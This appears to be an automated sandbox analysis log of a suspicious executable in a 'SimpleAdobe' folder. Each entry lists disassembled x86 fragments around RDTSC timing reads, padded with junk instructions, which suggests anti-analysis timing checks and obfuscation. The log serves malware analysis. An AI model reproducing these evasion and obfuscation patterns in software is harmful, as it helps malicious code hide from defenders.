Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515046A second address: 515046E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 515046E second address: 5150495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7F0D2259C5h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5150495 second address: 5150499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 519006D second address: 5190088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259C7h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5190088 second address: 519009A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, 657Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 519009A second address: 519009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 519009F second address: 51900A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51900A4 second address: 51900D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F0D2259BDh 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51605BD second address: 51605DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, 35FDE43Fh 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F0D21AE11h 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51605DE second address: 5160614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d mov esi, 0A36A8B3h 0x00000012 popad 0x00000013 and dword ptr [eax+04h], 00000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F0D2259C1h 0x0000001e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51407BE second address: 5140807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7F0D21AE13h 0x00000013 jmp 00007F7F0D21AE13h 0x00000018 popfd 0x00000019 mov edx, eax 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7F0D21AE0Ch 0x00000026 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5140807 second address: 514080D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 516030F second address: 516037A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F0D21AE10h 0x00000008 xor ecx, 2BAE6198h 0x0000000e jmp 00007F7F0D21AE0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7F0D21AE18h 0x0000001c add esi, 17FA8BF8h 0x00000022 jmp 00007F7F0D21AE0Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7F0D21AE15h 0x00000031 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 516037A second address: 5160380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5160380 second address: 5160384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5160384 second address: 5160388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51806CE second address: 51806D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51806D2 second address: 51806ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51806ED second address: 518071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F0D21AE0Dh 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 518071A second address: 5180720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180720 second address: 5180724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180724 second address: 5180728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180728 second address: 5180745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7F0D21AE10h 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180745 second address: 518074B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 518074B second address: 5180751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180751 second address: 51807B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7F0D2259C0h 0x00000011 add ch, FFFFFFE8h 0x00000014 jmp 00007F7F0D2259BBh 0x00000019 popfd 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d call 00007F7F0D2259C6h 0x00000022 mov dh, ah 0x00000024 pop edi 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7F0D2259C4h 0x00000031 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51807B3 second address: 51807C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51807C2 second address: 51807C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51807C8 second address: 51807F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d call 00007F7F0D21AE14h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51808DE second address: 51808E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51808E4 second address: 51808E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51808E8 second address: 5180971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a jmp 00007F7F0D2259C7h 0x0000000f leave 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7F0D2259C4h 0x00000017 jmp 00007F7F0D2259C5h 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov di, 2562h 0x00000022 pop edx 0x00000023 popad 0x00000024 retn 0004h 0x00000027 nop 0x00000028 mov esi, eax 0x0000002a lea eax, dword ptr [ebp-08h] 0x0000002d xor esi, dword ptr [00A24014h] 0x00000033 push eax 0x00000034 push eax 0x00000035 push eax 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 push eax 0x0000003a call 00007F7F119C4BA6h 0x0000003f push FFFFFFFEh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F7F0D2259BBh 0x0000004a adc ch, 0000005Eh 0x0000004d jmp 00007F7F0D2259C9h 0x00000052 popfd 0x00000053 mov bl, ah 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180971 second address: 5180986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180986 second address: 518098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 518098A second address: 51809A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809A7 second address: 51809BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F7F119C4C11h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809BA second address: 51809BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809BE second address: 51809D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809D0 second address: 51809D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809D6 second address: 51809DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51809DA second address: 5180A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push esi 0x0000000b pushfd 0x0000000c jmp 00007F7F0D21AE0Bh 0x00000011 sub cl, FFFFFFDEh 0x00000014 jmp 00007F7F0D21AE19h 0x00000019 popfd 0x0000001a pop ecx 0x0000001b mov edx, 13E75F54h 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 jmp 00007F7F0D21AE13h 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push edi 0x0000002f pop ecx 0x00000030 call 00007F7F0D21AE17h 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5180A4B second address: 5180A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F0D2259C7h 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513000B second address: 5130074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 47E7h 0x00000007 pushfd 0x00000008 jmp 00007F7F0D21AE0Ch 0x0000000d add esi, 15B5A018h 0x00000013 jmp 00007F7F0D21AE0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, dx 0x00000021 mov ecx, edi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7F0D21AE0Fh 0x0000002e sbb eax, 0AF3218Eh 0x00000034 jmp 00007F7F0D21AE19h 0x00000039 popfd 0x0000003a mov dx, si 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130074 second address: 5130090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov cx, C5ABh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F0D2259BDh 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130090 second address: 51300B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F0D21AE15h 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51300B1 second address: 51300C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259BCh 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51300C1 second address: 51300C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51300C5 second address: 5130104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c mov cx, di 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 push esi 0x00000013 jmp 00007F7F0D2259C0h 0x00000018 mov dword ptr [esp], ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F0D2259C7h 0x00000022 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130104 second address: 513010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513010A second address: 513010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513010E second address: 513011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513011D second address: 5130121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130121 second address: 513013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513013A second address: 5130228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F0D2259C7h 0x00000009 jmp 00007F7F0D2259C3h 0x0000000e popfd 0x0000000f mov edx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esp], ebx 0x00000017 pushad 0x00000018 call 00007F7F0D2259C0h 0x0000001d mov bx, cx 0x00000020 pop eax 0x00000021 jmp 00007F7F0D2259C7h 0x00000026 popad 0x00000027 mov ebx, dword ptr [ebp+10h] 0x0000002a jmp 00007F7F0D2259C6h 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F7F0D2259BEh 0x00000037 or al, 00000068h 0x0000003a jmp 00007F7F0D2259BBh 0x0000003f popfd 0x00000040 jmp 00007F7F0D2259C8h 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007F7F0D2259BBh 0x0000004c xchg eax, esi 0x0000004d jmp 00007F7F0D2259C6h 0x00000052 mov esi, dword ptr [ebp+08h] 0x00000055 pushad 0x00000056 mov ax, 267Dh 0x0000005a mov eax, 0F80AD79h 0x0000005f popad 0x00000060 xchg eax, edi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130228 second address: 513022E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513022E second address: 5130272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F0D2259C7h 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 push ecx 0x00000016 mov di, 1832h 0x0000001a pop edx 0x0000001b popad 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7F0D2259C0h 0x00000027 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130272 second address: 5130276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130276 second address: 513027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513027C second address: 51302AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7F7F01918Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F0D21AE17h 0x00000016 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51302AD second address: 51302CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 call 00007F7F0D2259BBh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51302CF second address: 51302D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51302D3 second address: 51302E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51302E3 second address: 51302E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51302E8 second address: 513031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7F7F023CF0h 0x0000000f pushad 0x00000010 movsx ebx, ax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F7F0D2259BEh 0x0000001b xor ch, FFFFFF98h 0x0000001e jmp 00007F7F0D2259BBh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513031B second address: 5130352 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F0D21AE18h 0x00000008 sbb cx, B9F8h 0x0000000d jmp 00007F7F0D21AE0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov edx, dword ptr [esi+44h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ebx, eax 0x0000001e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130352 second address: 51303A1 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 6D7Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F7F0D2259BAh 0x0000000d jmp 00007F7F0D2259C2h 0x00000012 pop esi 0x00000013 popad 0x00000014 or edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007F7F0D2259C1h 0x0000001c test edx, 61000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7F0D2259BDh 0x00000029 rdtsc
